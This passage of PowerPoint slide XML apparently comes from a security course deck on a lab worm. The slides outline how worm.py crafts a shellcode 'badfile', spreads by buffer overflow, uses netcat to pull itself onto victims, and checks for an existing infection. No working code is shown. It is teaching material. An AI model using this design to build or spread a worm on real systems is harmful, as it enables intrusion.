              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Focus on exploiting buffer overflow vulnerability </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Britannic Bold" panose="020B0903060703020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>worm.py </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>to crafted </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Britannic Bold" panose="020B0903060703020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>badfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Britannic Bold" panose="020B0903060703020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>containing shellcode and commands</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>control</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Britannic Bold" panose="020B0903060703020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>shellcode </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>to gain the control of victim’s machines</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>infection/spreading</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Britannic Bold" panose="020B0903060703020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> commands to receive </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Britannic Bold" panose="020B0903060703020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>worm.py </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>at victim’s machines in Bash Shell sent by attacking machines</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ensure only one copy of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Britannic Bold" panose="020B0903060703020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>worm.py </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>is running </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>test the existence of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Britannic Bold" panose="020B0903060703020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>badfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Britannic Bold" panose="020B0903060703020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>to identify whether a victim has been infected</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>if true, it assumes other </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Britannic Bold" panose="020B0903060703020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>worm.py </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>is running and kills itself</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF3CAFDE-11B3-EC32-6F80-BB2EFBB489BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7226969" y="0"/>
            <a:ext cx="4965032" cy="795831"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2269940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8EDFD-3232-60DF-CDC0-B45447F54DF9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="383101" y="867894"/>
            <a:ext cx="4517145" cy="4273575"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2877813-7E0B-6850-10CC-36E3F87D81EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7163839" y="757660"/>
            <a:ext cx="4946991" cy="4393127"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3049099-8A89-7545-E7E6-B61F063E1CA1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1028242" y="1505245"/>
            <a:ext cx="3024554" cy="2339102"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Britannic Bold" panose="020B0903060703020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>worm.py </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>creates </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Britannic Bold" panose="020B0903060703020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>badfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Britannic Bold" panose="020B0903060703020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Britannic Bold" panose="020B0903060703020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Britannic Bold" panose="020B0903060703020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Britannic Bold" panose="020B0903060703020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Britannic Bold" panose="020B0903060703020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Britannic Bold" panose="020B0903060703020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>sends </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Britannic Bold" panose="020B0903060703020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>worm.py (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>spread</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Britannic Bold" panose="020B0903060703020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Arrow: Right 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A22F42F0-290E-9B81-EF1C-314B622018E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5034104" y="2806300"/>
            <a:ext cx="1837654" cy="328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A0BD703-BFC7-29BE-C528-DD50C0F265F1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4940283" y="1824444"/>
            <a:ext cx="2389596" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>send </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Britannic Bold" panose="020B0903060703020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>badfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Britannic Bold" panose="020B0903060703020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>to another machine via buffer overflow attack </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Britannic Bold" panose="020B0903060703020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2723EB88-B761-93E9-1A15-13AF144180BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7760677" y="2492558"/>
            <a:ext cx="3868615" cy="1477328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> in</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Britannic Bold" panose="020B0903060703020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Britannic Bold" panose="020B0903060703020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>badfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Britannic Bold" panose="020B0903060703020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Britannic Bold" panose="020B0903060703020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>executed (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>control</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Britannic Bold" panose="020B0903060703020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>wait for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Britannic Bold" panose="020B0903060703020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> worm.py </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>and execute it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Britannic Bold" panose="020B0903060703020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Britannic Bold" panose="020B0903060703020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>gets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Britannic Bold" panose="020B0903060703020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> worm.py </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>running forever</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="18" name="Straight Arrow Connector 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0ED00CA5-FDAA-47DE-873B-8B5B1873DFB7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3829397" y="1700237"/>
            <a:ext cx="1286248" cy="4508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C246EB-2EDD-ADA7-A80D-533A850550BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7123802" y="2500364"/>
            <a:ext cx="636875" cy="159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FE5035-6981-7196-56CF-C90A7BCB1F63}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3001108" y="3509108"/>
            <a:ext cx="4689230" cy="58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Arrow: Down 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49CD0FB1-0589-0D7F-B028-5B44C0554F14}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2465614" y="277586"/>
            <a:ext cx="176059" cy="590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918F14-9F76-C1BB-8F63-9BAE372B07D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2748273" y="407123"/>
            <a:ext cx="1894878" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>attacking machine</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A4DF6FF-E547-8FB9-5B6A-B19AA7A51250}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8945403" y="407123"/>
            <a:ext cx="780983" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Victim</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="Picture 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{171A0D4D-40CF-E616-24C1-74CFE422F631}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8945403" y="5548043"/>
            <a:ext cx="1243855" cy="1104593"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Arrow: Down 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A19C15D1-21DA-FF95-9D1F-04B44BF145EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9461275" y="5047337"/>
            <a:ext cx="176059" cy="590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6DDE63A9-FFEF-FEAB-A65D-8CDACE103063}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8749325" y="296635"/>
            <a:ext cx="176059" cy="590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BA5371-D21D-5018-8DE8-8DBCEDC6E551}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="57284" y="21790"/>
            <a:ext cx="724755" cy="865153"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="10" name="Straight Arrow Connector 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6AD55C99-4E93-E71F-EDA9-21F77294F5DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="782039" y="572740"/>
            <a:ext cx="910403" cy="9913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D256565-9BF2-E6B9-3735-7AB79A9F8F3C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="996918" y="580270"/>
            <a:ext cx="762453" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>writes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="Picture 2" descr="Server - Free technology icons">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF40221B-9E00-BBEA-109C-AF5CFC2FF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346" y="119571"/>
            <a:ext cx="645365" cy="64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0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75514-EB4F-B792-054E-13B0ACEE8949}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1260491" y="2319196"/>
            <a:ext cx="9213378" cy="1928027"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC1A2BD8-5C60-39C5-3340-832AB7CA5FAE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1260491" y="1860884"/>
            <a:ext cx="3370923" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The attacker writes the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="OCRB" panose="020B0609020202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>worm.py</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="414433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4B70E-5B93-3C10-DEF4-B92B094D8B6A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="213132" y="0"/>
            <a:ext cx="5882868" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
